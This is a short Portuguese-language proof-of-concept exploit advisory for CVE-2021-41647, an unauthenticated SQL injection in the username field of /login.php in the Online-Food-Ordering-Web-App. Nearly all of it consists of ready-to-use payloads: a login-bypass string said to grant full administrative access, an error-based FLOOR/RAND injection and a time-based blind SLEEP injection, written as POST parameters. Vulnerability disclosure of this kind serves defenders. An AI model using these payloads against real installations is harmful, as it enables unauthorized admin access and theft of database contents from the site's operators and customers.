
Exploit de prova de conceito para injeção SQL não autenticada no Online-Food-Ordering-Web-App, demonstrando técnicas de bypass de login e injeção cega baseada em erro/tempo.
CVE-2021-41647 Injeção SQL no Online-Food-Ordering-Web-App
O Online-Food-Ordering-Web-App é vulnerável a ataques de Injeção SQL não autenticados, baseados em erro e temporais cegos (time-based blind). O parâmetro username na página /login.php não sanitiza a entrada do usuário, permitindo que um invasor burle o login usando uma técnica simples de bypass.
URL: /login.php
PARÂMETRO: username
Para burlar o login do usuário e obter acesso administrativo total, insira o payload no campo de entrada username: user' or 1=1-- -
Parâmetro: username (Requisição POST)
Tipo: baseado em erro
Título: MySQL >= 5.0 AND baseado em erro - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf
Tipo: time-based blind
Título: MySQL >= 5.0.12 AND time-based blind (consulta SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Jason Colyvas
MOBIUSBINARY
20 de Setembro de 2021